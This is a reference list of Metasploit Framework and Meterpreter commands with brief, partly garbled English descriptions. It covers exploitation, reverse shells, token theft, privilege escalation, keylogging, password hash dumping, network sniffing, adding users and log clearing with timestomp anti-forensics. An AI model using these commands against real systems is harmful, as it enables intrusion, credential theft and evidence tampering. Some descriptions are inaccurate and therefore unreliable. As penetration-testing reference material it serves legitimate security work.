Metasploit Command Lists
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research. The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
show exploits: lists all infiltration attack modules in the metasploit framework.
show payloads: lists all attack loads in the metasploit framework.
show auxiliary: lists all secondary attack loads in the metasploit framework.
search name: find all the infiltration attacks and other modules in the metasploit framework.
info: Displays information about infiltration attacks or modules.
use module_name: load a penetration attack or module.
LHOST : you can let the target host to connect to the IP address, usually when the target host is not in the same LAN, you need to be a public IP address, especially for the bounce shell.
RHOST : remote host or target host.
set function: sets the specific configuration parameters (EG: sets the local or remote host parameters).
setg function: sets the specific configuration parameters globally (EG: sets local or remote host parameters ).
show options: lists all of the infiltration attacks or all the configuration parameters in the module.
show targets: lists all targeted platforms that penetrate attacks.
set target parameter: specifies the operating system or version type of the target you know.
set payload name: specifies the attack load that you want to use.
show advanced:list all advanced configuration options.
set autorunscript migrate -f: after the infiltration attack is completed, it will automatically migrate to another process.
check: whether there is a corresponding security vulnerability in the presence of a penetration attack.
exploit: an infiltration attack or module to attack a target.
exploit -j: attack under the planned task (attack will be done in the background).
exploit -e encoder: the attack load encoding (EG: exploit -e shikata_ga_nai).
exploit -h: lists the help information for the exploit command.
sessions -l : lists the available interactive sessions (used when handling multiple shells).
sessions -l -v: lists all available interactive sessions and details, EG: Which security vulnerability is used to attack the system?
sessions -s script: run a specific metasploit script in all active metasploit sessions.
sessions -k: kill all active interactive sessions.
sessions -c cmd: executes a command on all active metasploit sessions.
sessions -u sessionID: update shell to meterpreter
db_create name: create a database to use the database to drive the attack (EG: db_create autopwn).
db_connect name: create and connect to a database (EG: db_connect user: passwd @ip/vuln) to be used by a database-driven attack.
db_namp: use nmap and store the scan data in the database (support the normal nmap statement, EG: -sT -v -P0).
db_autopwn -h: show the help information for the db_autopwn command.
db_autopwn -p -r -e: execute db_autopwn on all discovered open ports, attack all systems, and use a bounce shell.
db_destroy: delete the current database.
Meterpreter command
help: list the meterpreter using help.
run scriptname: run the meterpreter script and see all script names in the scripts / meterpreter directory.
sysinfo: list the system information for the managed host.
ls: list the file and folder information for the destination host.
use priv: load the privilege lift extension module to extend the metasploit library.
ps: displays all running processes and associated user accounts.
migrate PID: migrate to a specified process ID (the PID number can be obtained from the host via the ps command).
use incognito: load incognito function (used to steal the target host’s token or fake user)
list_tokens -u: lists the available tokens for the target host user.
list_tokens -g: lists the available tokens for the target host user group.
impersonate_token DOMAIN_NAME\USERNAME: Counterfeit the available token on the target host.
steal_token PID: steals the available token for a given process and carries on the token counterfeit.
drop_token: stop fake current token.
getsystem: through a variety of attack vector to privilege the system user permissions.
execute -f cmd.exe -i: execute the cmd.exe command and interact with it.
execute -f cmd.exe -i -t: execute the cmd command with all available tokens and hide the process.
rev2self: return to the initial user account of the control target host.
reg command: in the target host registry to interact, create, delete, query and other operations.
setdesktop number: switch to another user interface (this feature is based on which users are logged in).
screenshot: screenshots the screen of the target host.
upload file: upload files to target host.
download file: download the file from the target host.
keyscan_start: turn on keystroke for remote target hosts.
keyscan_dump: stores the keystrokes captured on the target host.
keyscan_stop: stop the keyboard record for the target host.
getprivs: get as many privileges as possible on the target host.
uictl enable keyboard/mouse: take care of the target host’s keyboard and mouse.
background: change your current metasploit shell to background.
hashdump: export the password hash in the destination host.
use sniffer: load sniffing mode.
sniffer_interfaces: list all open network ports for the target host.
sniffer_dump interfaceID pcapname: start sniffing on the target host.
sniffer_start interfaceID packet-buffer: stats are fired on the target host for a specific range of packet buffers.
sniffer_stats interfaceID: obtain statistics for sniffing network interfaces.
sniffer_stop interfaceID: stop sniffing.
add_user username password -h ip: add a user to the remote destination host.
clearev: clear the log on the target host.
timestomp: modify file attributes, such as modifying file creation time (forensic investigation).
reboot: restart the target host.
